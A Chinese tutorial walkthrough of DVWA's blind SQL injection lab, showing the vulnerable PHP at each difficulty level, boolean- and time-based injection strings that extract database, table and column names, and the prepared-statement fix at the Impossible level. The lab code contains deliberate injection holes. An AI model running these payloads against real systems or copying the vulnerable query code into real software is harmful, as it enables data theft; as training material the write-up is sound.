dvwa之 SQL Injection(Blind) 盲注

一、简介

SQL Injection(Blind),即SQL盲注,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

手工盲注思路:手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。

手工盲注步骤:

  • 判断是否存在注入,注入是字符型还是数字型
  • 猜解当前数据库名
  • 猜解数据库中的表名
  • 猜解表中的字段名
  • 猜解数据

二、Low

1、服务器端代码




if( isset( $_GET[ 'Submit' ] ) ) {
    // Get input
    $id = $_GET[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '
User ID exists in the database.
'
; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'
; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>

2、漏洞分析
Low级别的代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞,同时SQL语句查询返回的结果只有两种:User ID exists in the database和User ID is MISSING from the database。
3、漏洞利用(基于布尔的盲注)

  • 是否存在注入,注入是字符型还是数字型
    输入 1 ,用户存在
    dvwa之 SQL Injection(Blind) 盲注_第1张图片
    输入 1’ and ‘1’ = ‘1 ,用户存在
    dvwa之 SQL Injection(Blind) 盲注_第2张图片
    输入 1’ and ‘1’ = '2 ,用户不存在,所以存在字符型注入。
    dvwa之 SQL Injection(Blind) 盲注_第3张图片

  • 猜解当前数据库名
    想要猜解数据库名,首先要猜解数据库名的长度,然后挨个猜解字符。
    1’ and length(database())=4 #,显示存在,说明数据库名长度为4
    dvwa之 SQL Injection(Blind) 盲注_第4张图片
    采用二分法猜解数据库名
    输入 1’ and ascii(substr(database(),1,1))<100 #显示不存在,说明数据库名的第一个字符的ascii值不小于100(小写字母d的ascii值);
    输入 1’ and ascii(substr(database(),1,1))>100 #显示不存在,说明数据库名的第一个字符的ascii值不大于100,说明第一个字符是’d’,同理可以猜解出其余三个字符。

  • 猜解数据库中的表名
    一个数据库可能包含多张表,首先猜解数据库中表的数量:
    输入 1’ and (select count(table_name) from information_schema.tables where table_schema=database())=1 #,显示不存在,
    输入 1’ and (select count(table_name) from information_schema.tables where table_schema=database())=2 #,显示存在,说明dvwa数据库有两张表
    接着挨个猜解表名:
    输入 1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=5#,显示存在,说明第一张表名称长度为5
    输入 1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=117 # ,显示存在,说明第一个字符是’u’。
    同理可以拆解出其余三个字符和另外一张表的名称。

  • 猜解表中的字段名
    输入 1’ and (select count(column_name) from information_schema.columns where table_name= ‘users’)=8 #,显示存在,说明users表存在8个字段。
    输入 1’ and length(substr((select column_name from information_schema.columns where table_name= ‘users’ limit 0,1),1))=7 #,显示存在,说明第一个字段由7个字符构成,
    每个字段的具体名称猜解方法不再累述。

  • 猜解数据
    同样采用二分法。

4、漏洞利用(基于时间的盲注)

  • 判断是否存在注入,注入是字符型还是数字型
    输入1’ and sleep(5) #, 存在明显延迟
    输入1 and sleep(5) #, 不存在明显延迟,故存在字符型基于时间的注入。
  • 猜解当前数据库名
    输入 1’ and if(length(database())=4,sleep(5),1) # 感觉到明显延迟,说明数据库由4个字符构成
    输入 1’ and if(ascii(substr(database(),1,1))=100,sleep(5),1) # 感觉到明显延迟,说明数据库名第一个字符是’d’,同理可以拆解出其余三个字符。
    • 猜解表名(过程与基于布尔的盲注类似,不再累述,下同)
    • 猜解字段名
    • 猜解数据

三、Medium

1、服务器端代码




if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $id ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '
User ID exists in the database.
'
; } else { // Feedback for end user echo '
User ID is MISSING from the database.
'
; } //mysql_close(); } ?>

dvwa之 SQL Injection(Blind) 盲注_第5张图片
2、漏洞分析
Medium级别的代码使用mysqli_real_escape_string函数对特殊符号\x00,\n,\r,’,”,\x1a进行转义,同时前端页面设置了下拉选择表单,控制用户输入,可以通过捉包-----修改参数-----重放请求三个过程构造恶意参数,过程和Low级别累述,不再累述。

四、High

1、服务器端代码



if( isset( $_COOKIE[ 'id' ] ) ) {
    // Get input
    $id = $_COOKIE[ 'id' ];

    // Check database
    $getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $getid ); // Removed 'or die' to suppress mysql errors

    // Get results
    $num = @mysqli_num_rows( $result ); // The '@' character suppresses errors
    if( $num > 0 ) {
        // Feedback for end user
        echo '
User ID exists in the database.
'
; } else { // Might sleep a random amount if( rand( 0, 5 ) == 3 ) { sleep( rand( 2, 4 ) ); } // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'
; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>

2、漏洞分析
High级别的代码利用cookie传递参数id,当SQL查询结果为空时,会执行函数sleep(seconds),目的是为了扰乱基于时间的盲注。同时在 SQL查询语句中添加了LIMIT 1,希望以此控制只输出一个结果,依然可以通过捉包-----修改参数-----重放请求三个过程修改cookie参数,并通过注释符注释掉LIMIT 1,过程和Low级别代码类似,不再累述。

五、Impossible

1、服务器端代码



if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        // Check the database
        $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
        $data->bindParam( ':id', $id, PDO::PARAM_INT );
        $data->execute();

        // Get results
        if( $data->rowCount() == 1 ) {
            // Feedback for end user
            echo '
User ID exists in the database.
'
; } else { // User wasn't found, so the page wasn't! header( $_SERVER[ 'SERVER_PROTOCOL' ] . ' 404 Not Found' ); // Feedback for end user echo '
User ID is MISSING from the database.
'
; } } } // Generate Anti-CSRF token generateSessionToken(); ?>

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,Anti-CSRF token机制的加入了进一步提高了安全性。

你可能感兴趣的:(dvwa之 SQL Injection(Blind) 盲注)